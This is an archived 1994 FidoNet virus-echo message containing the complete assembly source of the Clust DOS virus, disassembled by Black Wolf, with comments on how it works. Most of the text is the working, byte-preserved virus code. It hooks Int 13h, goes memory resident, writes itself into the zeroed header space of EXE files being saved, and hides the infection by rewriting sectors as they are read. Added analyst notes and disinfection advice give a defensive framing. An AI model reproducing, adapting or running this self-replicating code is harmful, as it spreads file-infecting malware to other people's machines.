

;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg : 40 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:15
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : CLUST.ASM
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: Информация о вирусах)
;* From : Mike Salvino, 2:283/718 (06 Nov 94 17:48)
;* To : Daniel Hendry
;* Subj : CLUST.ASM
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Mike.Salvino@f718.n283.z2.fidonet.org
;Clust Virus from TridenT research group - small but fairly interesting,
;it's one of the more advanced from TridenT that I've seen with the
;possible exception of the TPE.
;This virus goes memory resident at the top of lower memory and hooks
;Int 13h. Whenever an EXE file header is written, it checks to see
;if there is a large field of 0's inside it (VERY common in EXE's)
;and, if so, will put itself inside it and change the exe marker bytes
;'MZ' to a jump to that code. In this way, it effectively converts the
;file to a COM file when it is run. After this it re-executes the EXE
;file. Because of a stealth handler on Int 13h function 2 (absolute
;disk read) the EXE file is read back as it originally was (the handler
;zeros out the field in which it resides and replaces the jump with
;the original 'MZ' marker). Because of the way this virus works, it can
;only infect smaller EXE files.
;NOTE:
;Several instructions are commented out and have the actual bytes entered
;next to them instead. This is because the assembler that Clust was
;originally built with used different encodings than mine, and
;I wished to preserve the EXACT virus code.
;Disinfection: Because of this virus' stealth routine, disinfection should
; be possible simply by Zipping or Arjing all EXE files on an
; infected disk, then rebooting from a clean disk and unarchiving
; the files. The original archiving MUST be done while the
; virus is active in memory. Also - after rebooting - make
; sure the program you use to unarchive the files is _NOT_
; infected.
;Disassembly by Black Wolf
;-----------------------------------------------------------------------
; Analyst notes (added on review). The listing uses MASM-style syntax
; (.model tiny / dup / word ptr / offset), not NASM; it is a 16-bit
; real-mode DOS .COM image, org 100h.
;
; What the code below shows, for detection and cleanup:
;   * Resident Int 13h hook (installed by InstallVirus).
;     AH=2 (read): calls the original vector and, if the returned sector
;     starts with the word 7EEBh (bytes EB 7E = 'jmp short +7Eh'),
;     rewrites that word to 5A4Dh ('MZ') and zeros 115h bytes at
;     offset 80h before returning to the caller.
;     AH=3 (write): if the buffer starts with 'MZ', the header word at
;     offset 4 is below 75h and the 115h bytes at offset 80h are all
;     zero, copies the image starting at OldInt13 into that field and
;     replaces 'MZ' with 7EEBh. Every other function chains to the old
;     vector.
;   * On-disk indicator (only visible after booting from known-clean
;     media, since the read hook hides it): first word 7EEBh instead of
;     'MZ' and 115h (277) bytes of code at offset 80h of an EXE file.
;   * Runtime indicator: the last MCB ('Z') and the PSP top-of-memory
;     word are both reduced by 39h paragraphs, and the Int 13h vector
;     (set via INT 21h/AH=25h) points into the segment taken from that
;     top-of-memory word, i.e. just below the former top of conventional
;     memory.
;   * After installing, the host is re-run through INT 2Eh using the
;     filename copied from the environment block; with the read hook
;     active the host loads as an ordinary EXE.
;-----------------------------------------------------------------------
.model tiny
.code
org 100h
start:
jmp short EntryPoint
LotsaNOPs db 122 dup (90h) ;Usually will be EXE header....
OldInt13 dd 0 ;Saved original Int 13h vector (start of the resident image)
EntryPoint:
db 0e9h,7ch,0 ;jmp InstallVirus
;-----------------------------------------------------------------------
; Int13Handler: resident BIOS disk hook. AH=3 -> IsDiskWrite,
; AH=2 -> stealth read below, anything else -> GoInt13 (old vector).
;-----------------------------------------------------------------------
Int13Handler:
cmp ah,3 ;AH=3: write sectors
je IsDiskWrite
cmp ah,2 ;AH=2: read sectors
jne GoInt13 ;Anything else: pass straight through
pushf ;Emulate INT: push flags, then far call
call cs:OldInt13 ;Call original Int 13h
jc Exit13Handler ;Exit on error.
cmp word ptr es:[bx],7EEBh ;Is sector infected? (EB 7E = jmp short +7Eh)
jne Exit13Handler
mov word ptr es:[bx],5A4Dh ;Cover mark with 'MZ'
push di cx ax ;Stealth routine.....
mov cx,115h ;115h = size of the resident image
xor ax,ax
db 89h,0dfh ;mov di,bx
;Zero out virus from
add di,80h ;sector when it is read.
rep stosb
pop ax cx di
Exit13Handler:
iret
GoInt13:
jmp cs:[OldInt13]
;-----------------------------------------------------------------------
; IsDiskWrite: inspect a sector about to be written; ES:BX = caller's
; buffer. Falls through to GoInt13 in every case so the write proceeds.
;-----------------------------------------------------------------------
IsDiskWrite:
cmp word ptr es:[bx],5A4Dh ;Is EXE file being written?
jne GoInt13
cmp word ptr es:[bx+4],75h ;Is file too large? (header word +4 = page count)
jae GoInt13
push ax cx si di ds
push es
pop ds ;DS = caller's buffer segment
db 89h,0deh ;mov si,bx
add si,80h ;Look in EXE header....
mov cx,115h
AllZeros:
lodsb
cmp al,0
loopz AllZeros ;Stop at first non-zero byte or after 115h bytes
cmp cx,0 ;Check to see if entire field
jne ExitInfectHandler ;was zeroed - leave if not.
db 89h,0dfh ;mov di,bx
add di,80h
mov cx,115h
mov si,offset OldInt13 ;Source: resident image in our own segment
push cs
pop ds
rep movsb
db 89h,0dfh ;mov di,bx
;Copy virus
;over zero area in EXE header.
mov ax,7EEBh ;Stick in Jump over 'MZ'
stosw
ExitInfectHandler:
pop ds di si cx ax ;Allow Write to process now.
jmp short GoInt13
;-----------------------------------------------------------------------
; InstallVirus: run once from the carrier. Saves the Int 13h vector,
; carves 39h paragraphs off the top of conventional memory, copies the
; image there, points Int 13h at it, then re-executes the host via
; INT 2Eh.
;-----------------------------------------------------------------------
InstallVirus:
mov ax,3513h
int 21h ;Get Int 13 address
mov word ptr cs:[OldInt13],bx
mov word ptr cs:[OldInt13+2],es
mov ah,0Dh
int 21h ;Flush disk buffers
mov ah,36h
mov dl,0
int 21h ;Get free space on default drive (result not used by the code below)
mov ax,cs
dec ax
mov ds,ax ;DS = our own MCB (segment just below the PSP)
cmp byte ptr ds:0,'Z' ;Are we the last chain?
jne Terminate ;If not, terminate.
;sub word ptr ds:[3],39h ;subtract from MCB size
db 81h,2eh,03,0,39h,0
;sub word ptr ds:[12h],39h ;subtract from PSP TopOfMem
db 81h,2eh,12h,0,39h,0
mov si,offset OldInt13
db 89h,0f7h ;mov di,si
mov es,ds:[12h] ;ES = new segment
push cs
pop ds
mov cx,115h ;Copy virus into memory
rep movsb ;Same offsets in the new segment, so the handler address is reusable
mov ax,2513h
push es
pop ds
mov dx,offset Int13Handler
int 21h ;Set int 13 to virus handler
mov ah,4Ah
push cs
pop es
mov bx,39h
int 21h ;Modify mem alloc. (shrink own block to 39h paragraphs)
push cs
pop ds
mov bx,ds:[2ch] ;Get environment segment
mov es,bx
xor ax,ax
mov di,1
ScanForFilename: ;Find name of file executed
dec di ;in environment strings...
scasw ;(located after two 0's)
jnz ScanForFilename
lea si,[di+2]
push bx
pop ds ;DS = environment segment
push cs
pop es ;ES = code segment
mov di,offset Filename
push di
xor bx,bx ;BX = number of bytes copied
CopyFilename:
mov cx,50h ;Reloaded every pass, so the 50h bound never trips
inc bx
lodsb
cmp al,0
jne StoreFilename ;Change zero at end of
mov al,0Dh ;filename to a return
StoreFilename:
stosb
cmp al,0Dh ;If it was a return, we're
loopnz CopyFilename ;done copying the filename
mov byte ptr ds:[28fh],bl ;NOTE(review): DS is still the environment segment here; purpose of this store not evident from the listing
push cs
pop ds
pop si
dec si
int 2Eh ;Re-execute EXE file with
;Stealth handler in memory,
;so Exe is run w/o virus.
Terminate:
mov ah,4Ch
int 21h
db 0
Filename db 1 ;Filename buffer; stores above run past the end of the assembled image
end start
;-+- Terminate 1.50/Pro
; + Origin: Fred's Place (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; þ The MeÂeO
;
;/zi,/zd,/zn Debug info: zi=full, zd=line numbers only, zn=none
;
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)